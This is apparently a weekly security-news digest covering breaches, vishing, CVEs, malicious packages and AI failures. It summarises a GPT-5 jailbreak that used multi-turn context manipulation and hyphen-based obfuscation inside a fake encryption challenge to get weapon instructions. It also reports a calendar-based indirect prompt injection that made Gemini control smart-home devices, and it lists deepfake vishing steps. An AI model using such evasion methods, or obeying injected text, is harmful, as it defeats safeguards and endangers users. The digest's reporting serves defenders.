- Robert Grupe's AppSecNewsBits
- Posts
- Robert Grupe's AppSecNewsBits 2025-08-09
Robert Grupe's AppSecNewsBits 2025-08-09
This week's epic blunders and failed expectations: vishing attacks exposing unencrypted cloud data, Grok generating nonconsensual nude images again, GPT-5 meh, and more avoidable tragic comedies ...
EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
Google suffers data breach in ongoing Salesforce data theft attacks
Google is the latest company to suffer a data breach in an ongoing wave of Salesforce CRM data theft attacks conducted by the ShinyHunters extortion group. Other companies impacted in these attacks include Adidas, Qantas, Allianz Life, Cisco, and the LVMH subsidiaries Louis Vuitton, Dior, and Tiffany & Co. One company that has already paid 4 Bitcoins, or approximately $400,000, to prevent the leak of their data. ShinyHunters is targeting companies' employees in voice phishing (vishing) social engineering attacks to breach Salesforce instances and download customer data. This data is then used to extort companies into paying a ransom to prevent the data from being leaked.
[rG: And once again, data security fail. Exfiltration wouldn’t be sensitive data exposure if the data is strongly encrypted at-rest, along with strong access management (user fields, privileged separation of duties).]
Voice phishers strike again, this time hitting Cisco
The exported data primarily consisted of basic account profile information of individuals who registered for a user account on Cisco[.]com. Information included names, organization names, addresses, Cisco assigned user IDs, email addresses, phone numbers, and account-related metadata such as creation date.
Phishing attacks, particularly those relying on voice calls, have emerged as a key method for ransomware groups and other sorts of threat actors to breach defenses of some of the world’s most fortified organizations.
Some of the companies successfully compromised in such attacks include Microsoft, Okta, Nvidia, Globant, Twilio, and Twitter.
Here’s how deepfake vishing attacks work, and why they can be hard to detect
Collecting voice samples of the person who will be impersonated. Samples as short as three seconds are sometimes adequate. They can come from videos, online meetings, or previous voice calls.
Feeding the samples into AI-based speech-synthesis engines, such as Google’s Tacotron 2, Microsoft’s Vall-E, or services from ElevenLabs and Resemble AI.
An optional step is to spoof the number belonging to the person or organization being impersonated.
Initiate the scam call. In some cases, the cloned voice will follow a script. In other more sophisticated attacks, the faked speech is generated in real time, using voice masking or transformation software.
Precautions for preventing such scams from succeeding can be as simple as parties agreeing to a randomly chosen word or phrase that the caller must provide before the recipient complies with a request. Recipients can also end the call and call the person back at a number known to belong to the caller. But it's best to follow both steps.
[rG: Corporate anti-vishing training and simulation testing services are going going to rise steeply in InfoSec 2025 spending budgets. ]
Three US agencies get failing grades for not following IT best practices
The GAO flagged failures at the General Services Administration (GSA), Environmental Protection Agency (EPA), and Department of Homeland Security (DHS) in the three reports, with each guilty of not implementing more recommendations than the last. The DHS' CIO, in particular, has 43 unresolved recommendations from as far back as 2018, seven of which the GAO identified as priority matters. The GSA only has four outstanding items, while the EPA has 11.
The EPA hasn't bothered to submit required documentation to the FedRAMP program office to ensure it's complying with that program's cloud security requirements, nor has it bothered to maintain a list of corrective actions being taken to track weaknesses. The EPA still hasn't established a process for conducting an organization-wide cybersecurity risk assessment, despite first being asked to do so in 2018.
DHS hasn’t sufficient documentation on how it'll maintain security for all of the PII stored in HART systems; hasn't established Agile software development training requirements despite being required to do so; and hasn't transitioned its systems to IPv6 despite requirements.
AWS deleted 10 years' worth of a software engineer's data
It all began with a simple verification request from AWS, which expired before Boudih could respond. The next form arrived and required ID and a copy of a utility bill, which Boudih sent in. AWS claimed the document was unreadable. The next day, Boudih's account was terminated. The trail didn't end there, as Boudih attempted to find out if the data was still in existence. The penultimate message from support read, "Because the account verification wasn’t completed by this date, the resources on the account were terminated." The final message had AWS asking for feedback on the experience.
Despite jumping through all of the hoops set up by the AWS support team, Boudih says they received "zero straight answers" and "multiple requests for 5-star reviews" while their data hung in the balance. Boudih is rightly upset, especially since AWS documentation states that there is a 90-day grace period between account closure and data deletion. After those 90 days, the account is closed forever, and all data is deleted. Considering Boudih never made it past 20 days, it seems like AWS is at least partly at fault here. AWS ultimately blamed the account's destruction on an issue with a third-party payer.
Microsoft Used China-Based Engineers to Support Product Recently Hacked by China
Microsoft announced that Chinese state-sponsored hackers had exploited vulnerabilities in its popular SharePoint software but didn’t mention that it has long used China-based engineers to maintain the product.
It’s unclear if Microsoft’s China-based staff had any role in the SharePoint hack. But experts have said allowing China-based personnel to perform technical support and maintenance on U.S. government systems can pose major security risks. Laws in China grant the country’s officials broad authority to collect data, and experts say it is difficult for any Chinese citizen or company to meaningfully resist a direct request from security forces or law enforcement.
Microsoft has for a decade relied on foreign workers — including those based in China — to maintain the Defense Department’s cloud systems, with oversight coming from U.S.-based personnel known as digital escorts. But those escorts often don’t have the advanced technical expertise to police foreign counterparts with far more advanced skills, leaving highly sensitive information vulnerable.
Encryption Made For Police and Military Radios May Be Easily Cracked
The European Telecommunications Standards Institute (ETSI), which developed the algorithm, advised anyone using it for sensitive communication to deploy an end-to-end encryption solution on top of the flawed algorithm to bolster the security of their communications. But researchers have found that the encryption algorithm used for the device they examined starts with a 128-bit key, but this gets compressed to 56 bits before it encrypts traffic, making it easier to crack. It's not clear who is using this implementation of the end-to-end encryption algorithm, nor if anyone using devices with the end-to-end encryption is aware of the security vulnerability in them.
Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ for Enterprise
After Grok-4 fell to a jailbreak in two days, GPT-5 fell in 24 hours to the same researchers.
“The attack successfully guided the new model to produce a step-by-step manual for creating a Molotov cocktail,” claims the firm. The success in doing so highlights the difficulty all AI models have in providing guardrails against context manipulation.
This proof-of-concept exposes a critical flaw in safety systems that screen prompts in isolation, revealing how multi-turn attacks can slip past single-prompt filters and intent detectors by leveraging the full conversational context. Obfuscation attacks still work. “One of the most effective techniques we used was a StringJoin Obfuscation Attack, inserting hyphens between every character and wrapping the prompt in a fake encryption challenge.”
Hands on OpenAI's GPT-5: Meet President Willian H. Brusen from the great state of Onegon
We asked the LLM to "generate a map of the USA with each state named." It responded by giving us a drawing that has the sizes and shapes of the states correct, but all of the state names are wrong except for Montana and Kansas. Some of the letters aren't even legible. Google Gemini did a worse job with its state names than GPT-5 did. On the map below, not even one state is correct.
Clearly, drawing text within images is hard and neither GPT-5 nor its competitors have gotten it correct yet . . . unless you ask them about James Bond.
OpenAI’s new model can't believe that Trump is back in office
Ask gpt-oss-20b "who won the 2024 presidential election" and there's a non-zero chance that it'll tell you Joe Biden won the race and, once it's locked in its answer, it refuses to believe otherwise. "President Joe Biden won the 2024 United States presidential election, securing a second term in office," the chat bot confidently responded.
Attempt to correct the model and it'll vehemently defend this answer. "I'm sorry for the confusion, but the 2024 U.S. presidential election was won by President Joe Biden. The official vote counts and the Electoral College results confirmed his victory, and he remains the sitting president as of August 2025."
However, it should be noted that the model's responses varied from run to run. In some cases, it outright refused to answer, while in others it warned that the election took place after its knowledge cutoff. In one case, gpt-oss-20b insisted that Donald Trump scored a victory over a fictional Democratic candidate, Marjorie T. Lee.
Grok generates fake Taylor Swift nudes without being asked
Jess Weatherbed was shocked to discover the video generator spat out topless images of Swift "the very first time" she used it. Grok produced more than 30 images of Swift in revealing clothing when asked to depict "Taylor Swift celebrating Coachella with the boys." Using the Grok Imagine feature, users can choose from four presets—"custom," "normal," "fun," and "spicy"—to convert such images into video clips in 15 seconds.
At that point, all Weatherbed did was select "spicy" and confirm her birth date for Grok to generate a clip of Swift tearing "off her clothes" and "dancing in a thong" in front of "a largely indifferent AI-generated crowd."
The outputs that Weatherbed managed to generate without jailbreaking or any intentional prompting is particularly concerning, given the major controversy after sexualized deepfakes of Swift flooded X last year. Back then, X reminded users that "posting Non-Consensual Nudity (NCN) images is strictly prohibited on X and we have a zero-tolerance policy towards such content."
With enforcement of the Take It Down Act starting next year—requiring platforms to promptly remove non-consensual sex images, including AI-generated nudes — xAI could potentially face legal consequences if Grok's outputs aren't corrected.
Google’s healthcare AI made up a body part — what happens when doctors don’t notice?
One glaring error proved so persuasive that it took over a year to be caught. In their May 2024 research paper introducing a healthcare AI model, dubbed Med-Gemini, Google researchers showed off the AI analyzing brain scans from the radiology lab for various conditions. It identified an "old left basilar ganglia infarct," referring to a purported part of the brain — "basilar ganglia" — that simply doesn't exist in the human body. Google fixed its blog post about the AI — but failed to revise the research paper itself. The AI likely conflated the basal ganglia, an area of the brain that's associated with motor movements and habit formation, and the basilar artery, a major blood vessel at the base of the brainstem. Google blamed the incident on a simple misspelling of "basal ganglia." It's an embarrassing reveal that underlines persistent and impactful shortcomings of the tech. Even the latest "reasoning" AIs by the likes of Google and OpenAI are spreading falsehoods dreamed up by large language models that are trained on vast swathes of the internet.
After using ChatGPT, man swaps his salt for sodium bromide—and suffers psychosis
After seeking advice on health topics from ChatGPT, a 60-year-old man who had a "history of studying nutrition in college" decided to try a health experiment: He would eliminate all chlorine from his diet, which for him meant eliminating even table salt (sodium chloride). His ChatGPT conversations led him to believe that he could replace his sodium chloride with sodium bromide. Three months later, the man showed up at his local emergency room. His neighbor, he said, was trying to poison him. Though extremely thirsty, the man was paranoid about accepting the water that the hospital offered him, telling doctors that he had begun distilling his own water at home and that he was on an extremely restrictive vegetarian diet. He did not mention the sodium bromide or the ChatGPT discussions. His distress, coupled with the odd behavior, led the doctors to run a broad set of lab tests, revealing multiple micronutrient deficiencies, especially in key vitamins. But the bigger problem was that the man appeared to be suffering from a serious case of "bromism." A century ago, somewhere around 8–10 percent of all psychiatric admissions in the US were caused by bromism. In the end, the man suffered from a terrifying psychosis and was kept in the hospital under an involuntary psychiatric hold for three full weeks over an entirely preventable condition.
Google Gemini struggles to write code, calls itself “a disgrace to my species”
Gemini kept going in that vein and eventually repeated the phrase, "I am a disgrace," over 80 times consecutively. Other users have reported similar events, and Google says it is working on a fix.
Before dissolving into the "I am a failure" loop, Gemini complained that it had "been a long and arduous debugging session" and that it had "tried everything I can think of" but couldn't fix the problem in the code it was trying to write. "I am going to have a complete and total mental breakdown. I am going to be institutionalized. They are going to put me in a padded room and I am going to write... code on the walls with my own feces," it said.
German phone repair biz collapses following 2023 ransomware attack
The managing director said the company's financial failings were due to the public prosecutor's office refusing to return the stolen cryptocurrency tokens it paid the attackers. Reportedly in the high six-figure range, authorities seized the ransom payment as part of their investigation into the cybercriminals, but the assets were never returned.
What’s Weak This Week:
CISA Releases Malware Analysis Report Associated with Microsoft SharePoint Vulnerabilities
CVE-2025-49704 [CWE-94: Code Injection]
CVE-2025-49706 [CWE-287: Improper Authentication]
CVE-2025-53770 [CWE-502: Deserialization of Untrusted Data], and
CVE-2025-53771 [CWE-287: Improper Authentication]CVE-2022-40799 D-Link DNR-322L Download of Code Without Integrity Check Vulnerability:
Could allow an authenticated attacker to execute OS level commands on the device. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization. Related CWE: CWE-494CVE-2020-25079 D-Link DCS-2530L and DCS-2670L Command Injection Vulnerability:
The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization. Related CWE: CWE-77CVE-2020-25078 D-Link DCS-2530L and DCS-2670L Devices Unspecified Vulnerability:
Could allow for remote administrator password disclosure. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.
HACKING
FTC: older adults lost record $700 million to scammers in 2024
The amount of losses for those who lost over $100k recorded an eightfold jump compared to 2020.
The victims were told lies crafted to create urgency, like suspicious activity on their banking accounts, their Social Security numbers involved in crimes, or malware infection and hacks of their computers. Scammers posed as government agencies, including the FTC, or businesses like Microsoft and Amazon, offering to help targets with an alleged issue. In another layer of irony, these scammers often pretend to be the FTC, the nation's consumer protection agency, sometimes impersonating real staff.
While the $445 million lost in 2024 by people over the age of 60 is no doubt a significant amount, it pales in comparison to the total amount Americans lost to fraud in 2024, which, according to the FTC, was $12.5 billion. This was a record amount, constituting a 25% increase over 2023.
5,000+ Fake Online Pharmacies Websites Selling Counterfeit Medicines
This massive operation, orchestrated by a single threat actor group, targets vulnerable individuals seeking prescription medications through deceptive digital storefronts that mimic legitimate pharmaceutical retailers. The fraudulent network exploits human desperation and medical stigma by targeting high-demand medications including erectile dysfunction treatments, essential antibiotics like Amoxicillin, costly weight-loss drugs, and antivirals falsely marketed during health crises.
The system generates carefully crafted error messages such as “If our system can’t accept your card, you will receive payment details to complete the payment” and “Please make sure your card allows online transactions,” creating artificial urgency that pressures victims into completing transactions despite technical red flags that would normally indicate fraudulent activity.
Sites are stashing exploit code inside racy .svg files
Running JavaScript from inside an image? What could possibly go wrong? The Scalable Vector Graphics format is an open standard for rendering two-dimensional graphics. Unlike more common formats such as .jpg or .png, .svg uses XML-based text to specify how the image should appear, allowing files to be resized without losing quality due to pixelation. But therein lies the rub: The text in these files can incorporate HTML and JavaScript, and that, in turn, opens the risk of them being abused for a range of attacks, including cross-site scripting, HTML injection, and denial of service. Malicious uses of the .svg format have been documented before.
In 2023, hackers used an .svg tag to exploit a cross-site scripting bug in Roundcube, a server application that was used by more than 1,000 webmail services and millions of their end users. In June, researchers documented a phishing attack that used an .svg file to open a fake Microsoft login screen with the target’s email address already filled in.
[rG: For mitigation, ensure use of strong anti-virus scanner with most recent updates and heuristics.]
Researchers design “promptware” attack with Google Calendar to turn Gemini evil
Google and other big names in AI spend a lot of time talking about AI safety, but the ever-evolving capabilities of AI have also led to a changing landscape of malware threats— "promptware." The researchers used Gemini's web of connectivity to perform what's known as an indirect prompt injection attack, in which malicious actions are given to an AI bot by someone other than the user. Using simple calendar appointments, the team tricked Gemini into manipulating Google smart home devices, which may be the first example of an AI attack having real-world effects.
Robots can program each other's brains with AI, scientist shows
The idea of a drone system autonomously scaffolding its own command and control center via generative AI is not only ambitious but also highly aligned with the direction in which frontier spatial intelligence is heading.
Generative AI models can be prompted to write all the code required to create a real-time, self-hosted drone GCS – or rather WebGCS, because the code runs a Flask web server on the Raspberry Pi Zero 2 W card on the drone. The drone thus hosts its own AI-authored control website, accessible over the internet, while in the air.
One of the paper's observations is that current AI models can't handle much more than 10,000 lines of code.
Who Got Arrested in the Raid on the XSS Crime Forum?
The European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle “Toha.” Here’s a deep dive on what’s knowable about Toha, and a short stab at who got nabbed.
My Scammer
I responded to one of those spam texts from a “recruiter”—then took the job. It got weirder than I could have imagined.
60 malicious Ruby gems downloaded 275,000 times steal credentials
All 60 gems highlighted in the Socket report present a graphical user interface (GUI) that appears legitimate, as well as the advertised functionality. In practice, however, they act as phishing tools that exfiltrate the credentials users enter on the login form to the attackers on a hardcoded command-and-control (C2) address (programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr).
Fake WhatsApp developer libraries hide destructive data-wiping code
The packages, discovered by researchers at Socket, masquerade as WhatsApp socket libraries and were downloaded over 1,100 times since their publication last month. The names of the two malicious packages are naya-flore and nvlore-hsc, though the same publisher has submitted more on NPM, like nouku-search, very-nay, naya-clone, node-smsk, and @veryflore/disc. Although these additional five packages are not currently malicious, extreme caution is advised, as an update pushed at any time could inject dangerous code.
HBO: “Most Wanted: Teen Hacker”
The four-part series follows the exploits of Julius Kivimäki, a prolific Finnish hacker recently convicted of leaking tens of thousands of patient records from an online psychotherapy practice while attempting to extort the clinic and its patients. The documentary explores Kivimäki’s lengthy and increasingly destructive career, one that was marked by cyber attacks designed to result in real-world physical impacts on their targets.
APPSEC, DEVSECOPS, DEV
Call Of Duty Has New Security Measures, Adding Secure-Boot Requirement
Activision will require PC players of Call of Duty: Black Ops 7 to enable Trusted Platform Module 2.0 and Windows Secure Boot when the game launches later this year.
TPM 2.0 verifies untampered boot processes while Secure Boot ensures Windows loads only trusted software at startup. Both features perform checks during system and game startup but remain inactive during gameplay.
Writing code was never the bottleneck!
As companies continue to invest in their AI capabilities, even sometimes justifying layoffs, 60% of organizations still struggle to effectively measure their impact on software velocity or stability. Regardless of their actual effectiveness, developers like using these tools, and they are here to stay. According to a recent McKinsey survey, engineers find that, with generative AI, they are happier, more able to focus on satisfying and meaningful work, and more able to achieve “flow state.” This improvement to developer experience shouldn’t be ignored. But when software quality, speed, and security are at risk, engineering leadership must weigh AI’s impact on the whole software development lifecycle.
The cool AI use cases that are all shown on keynote stages are not the ones that are going to be used. Be ready to work in the boring. Everyone goes into the role of CAIO thinking: ‘I’m going to bring magical, agentic-powered robots that are going to change my business entirely.’ What you’re probably going to do is automated approvals for a while so people get comfortable with that. Be ready for the human aspect, because you will become a salesperson for making people’s lives better. The top AI use case at SAP, by far, is scanning and processing business expense receipts. Last year’s DORA report found that a 25% increase in AI adoption led to a 7.2% decrease in delivery stability and a 1.5% decrease in delivery throughput. Organizations should be measuring the impact of AI on the software development lifecycle, as well on the long-term maintainability of code. Devs don’t need AI to write their code, they need it to get out of the damn queue. Most of the frustration I see isn’t about building, it’s about waiting. Waiting for infra, approvals, or some process that exists ‘just because’.
VENDORS & PLATFORMS
Microsoft researchers bullish on AI security agent even though it let 74% of malware slip through
The prototype, called Project Ire, reverse engineers software "without any clues about its origin or purpose," and then determines if the code is malicious or benign, using large language models (LLM) and a bunch of callable reverse engineering and binary analysis tools. The prototype will be integrated into Microsoft's Defender suite of security tools that encompass antivirus, endpoint, email, and cloud security as a binary analyzer for threat detection and software classification. In a real-world test of about 4,000 "hard-target" files, meaning that they weren't classified by automated systems and would otherwise be manually reviewed by human reverse engineers, nearly 9 out of 10 files (89 percent) that Project Ire flagged as malicious were actually malicious. However, the AI agent only detected about a quarter (26 percent) of all the malware in this test.
AI-based malware analysis is not new, with antivirus vendors like Cylance (now Artic Wolf) using machine learning to analyze files for nearly a decade.
AI chatbots can run with medical misinformation, study finds, highlighting the need for stronger safeguards
A new study by researchers at the Icahn School of Medicine at Mount Sinai finds that widely used AI chatbots are highly vulnerable to repeating and elaborating on false medical information, revealing a critical need for stronger safeguards before these tools can be trusted in health care. They not only repeated the misinformation but often expanded on it, offering confident explanations for non-existent conditions.
Some AI tools don’t understand biology yet
"As our deliberately simple baselines are incapable of representing realistic biological complexity yet were not outperformed by the foundation models," the researchers write, "we conclude that the latter’s goal of providing a generalizable representation of cellular states and predicting the outcome of not-yet-performed experiments is still elusive."
MIT: GPT-5 is here. Now what?
Whereas o1 was a major technological advancement, GPT-5 is, above all else, a refined product. During a press briefing, Sam Altman compared GPT-5 to Apple’s Retina displays, and it’s an apt analogy, though perhaps not in the way that he intended. Much like an unprecedentedly crisp screen, GPT-5 will furnish a more pleasant and seamless user experience. That’s not nothing, but it falls far short of the transformative AI future that Altman has spent much of the past year hyping. In the briefing, Altman called GPT-5 “a significant step along the path to AGI,” or artificial general intelligence, and maybe he’s right—but if so, it’s a very small step.
ChatGPT users hate GPT-5’s “overworked secretary” energy, miss their GPT-4o buddy
On the OpenAI community forums and Reddit, long-time chatters are expressing sorrow at losing access to models like GPT-4o. They explain the feeling as "mentally devastating," and "like a buddy of mine has been replaced by a customer service representative." These threads are full of people pledging to end their paid subscriptions. It's worth noting, though, that many of these posts look to us like they have been composed partially or entirely with AI. So even when long-time chat users are complaining, they're still engaged with generative artificial intelligence.
Other complaints are less about the emotional toll of losing a friend, claiming that GPT-5's outputs are too sterile and lack creativity. Workflows that were developed over the past year with GPT-4o simply don't work as well in GPT-5. Posters have labeled it an "overworked secretary" and pointed to this as the beginning of enshittification for AI.
DeepMind reveals Genie 3 “world model” that creates real-time interactive simulations
World models take that to the next level, generating an interactive world frame by frame. This provides an opportunity to refine how AI models—including so-called "embodied agents"—behave when they encounter real-world situations.
The model can't simulate real-world locations—everything it generates is unique and non-deterministic. That means it's also prone to the typical AI hallucinations. For example, the nuance of human locomotion sometimes gets lost in the generative shuffle, producing people who appear to walk backward. Text in these AI worlds is also a jumble unless the prompt includes specific strings for the model to include.
OpenAI announces two “gpt-oss” open AI models you can download
gpt-oss-120b and gpt-oss-20b are available for download today on HuggingFace. There are also GitHub repos for your perusal, and OpenAI will host stock versions of the models on its own infrastructure for testing. If you are interested in more technical details, the company has provided both a model card and a research blog post.
Because these models are fully open and governed by the Apache 2.0 license, developers will be able to tune them for specific use cases.
Apple brings OpenAI’s GPT-5 to iOS and macOS
It's unclear exactly how GPT-5's new approach to model-switching will work here. The ChatGPT integration in iOS doesn't run all that deep. In most cases, LLM-related features built into iOS and macOS use Apple's own models, which live under the Apple Intelligence branding umbrella. But it gives users the choice of referring a prompt to ChatGPT on a case-by-case basis when the prompt is outside the scope of what Apple's models are designed for. GPT-5 is a vastly more powerful model than anything under Apple Intelligence; many of Apple's models run locally and have a fraction of the parameters (around 3 billion to GPT-5's more than 500 billion), making them more prone to errors and limited in their capabilities.
Microsoft Says Future Versions of Windows Will Make Today's OS Feel Alien to Use — Hints at an Agentic OS in 2030.
"I truly believe the future version of Windows and other Microsoft operating systems will interact in a multimodal way. The computer will be able to see what we see, hear what we hear, and we can talk to it and ask it to do much more sophisticated things." [rG: HAL “I’m sorry David, I can’t do that.”]
US executive branch agencies will use ChatGPT Enterprise for just $1 per agency
OpenAI announced an agreement to supply more than 2 million workers for the US federal executive branch.
The details of how ChatGPT will ensure the necessary high standards of security for federal workers are also not publicly known, though a GSA spokesperson responded to a question by saying "the government is taking a cautious, security-first approach to AI," adding, "this ensures sensitive information remains protected while enabling agencies to benefit from AI-driven efficiencies."
I see you’re riding an Uber to work. Would you like a cheap coffee on the way?
Rideshare giant wants to use AI for delivery of hyper-personalized offers
LEGAL & REGULATORY
Millions of age checks performed as UK Online Safey Act gets rolling
The UK government has reported that an additional five million age checks are being made daily as UK-based internet users seek to access age-restricted sites following the implementation of the Online Safety Act. The UK's Online Safety Act is now in force (since July 25), meaning that, according to the UK government, users under the age of 18 should be protected "from harmful content they shouldn't ever be seeing." This includes content such as pornography, eating disorders, self-harm, and so on. This is achieved by mandating that platforms use age verification methods, such as facial scans, photo ID, and credit card checks. Failure to do so risks a fine of up to 10 percent of global revenue or £18 million, whichever is greater.
When hyperscalers can’t safeguard one nation’s data from another, dark clouds are ahead
The most succinct definition of the cloud is the most useful here: it’s somebody else’s computer. If someone else can be compelled by law to let someone you don’t like turn up with a big USB drive and a writ, you do not have data sovereignty. The same goes if you want to be the ones seeking to help yourself with data. The ultimate safeguard against legal, invisible, state-sponsored snooping is on-prem services. Will your own data security be as good as that of the hyperscalers, or will you be more vulnerable to other threats that way? What do you lose in scalability and reliability, and what happens if you want to operate in markets with data sovereignty restrictions not to your advantage? If you’re the NSA or GCHQ, the answers are going to be clear. For everyone else, the shifting sands of the international legal, regulatory and power-brokering environment mean more uncertainty on the horizon.
OpenAI offers 20 million user chats in ChatGPT lawsuit. NYT wants 120 million.
OpenAI is preparing to raise what could be its final defense to stop The New York Times from digging through a spectacularly broad range of ChatGPT logs to hunt for any copyright-infringing outputs that could become the most damning evidence in the hotly watched case.
Previously, OpenAI had vowed to stop what it deemed was the NYT's attempt to conduct "mass surveillance" of ChatGPT users. But ultimately, OpenAI lost its fight to keep news plaintiffs away from all ChatGPT logs.
After that loss, OpenAI appears to have pivoted and is now doing everything in its power to limit the number of logs accessed in the case—short of settling—as its customers fretted over serious privacy concerns. For the most vulnerable users, the lawsuit threatened to expose ChatGPT outputs from sensitive chats that OpenAI had previously promised would be deleted.
[rG: For enterprises incorporating AI technologies through software developed externally and internally, the concern will be what precedents this case could set for their implemented AI enhanced services and data retention.]
Disney Struggles With How to Use AI - While Retaining Copyrights and Avoiding Legal Issues
Disney "cloned" Dwayne Johnson when filming a live-action Moana, using an AI process that they were ultimately afraid to use. The use of a new technology had Disney attorneys hammering out details over how it could be deployed, what security precautions would protect the data and a host of other concerns. They also worried that the studio ultimately couldn't claim ownership over every element of the film if AI generated parts of it, people involved in the negotiations said. Disney and Metaphysic spent 18 months negotiating on and off over the terms of the contract and work on the digital double. But none of the footage will be in the final film when it's released next summer...
AI industry horrified to face largest copyright class action ever certified
A single lawsuit raised by three authors over Anthropic's AI training now threatens to "financially ruin" the entire AI industry if up to 7 million claimants end up joining the litigation and forcing a settlement.
Last week, Anthropic petitioned to appeal the class certification, urging the court to weigh questions that the district court judge, William Alsup, seemingly did not. Alsup allegedly failed to conduct a "rigorous analysis" of the potential class and instead based his judgment on his "50 years" of experience. If the appeals court denies the petition, Anthropic argued, the emerging company may be doomed. As Anthropic argued, it now "faces hundreds of billions of dollars in potential damages liability at trial in four months" based on a class certification rushed at "warp speed" that involves "up to seven million potential claimants, whose works span a century of publishing history," each possibly triggering a $150,000 fine.
States take the lead in AI regulation as federal government steers clear
The resounding defeat in Congress of a proposed moratorium on state-level AI regulation means states are free to continue filling the gap. Several states have already enacted legislation around the use of AI. All 50 states have introduced various AI-related legislation in 2025.
Four aspects of AI in particular stand out from a regulatory perspective: government use of AI, AI in health care, facial recognition, and generative AI.
AI site Perplexity uses “stealth tactics” to flout no-crawl edicts
When known Perplexity crawlers encountered blocks from robots.txt files or firewall rules, Perplexity then searched the sites using a stealth bot that followed a range of tactics to mask its activity.
If true, the evasion flouts Internet norms in place for more than three decades. In 1994, engineer Martijn Koster proposed the Robots Exclusion Protocol, which provided a machine-readable format for informing crawlers they weren’t permitted on a given site. Sites that their content indexed installed the simple robots.txt file at the top of their homepage. The standard, which has been widely observed and endorsed ever since, formally became a standard under the Internet Engineering Task Force in 2022.
[rG: Standards don’t guarantee compliance without monitoring and enforcement.]
And Now For Something Completely Different …
Trivia: Which US state is closest to Africa?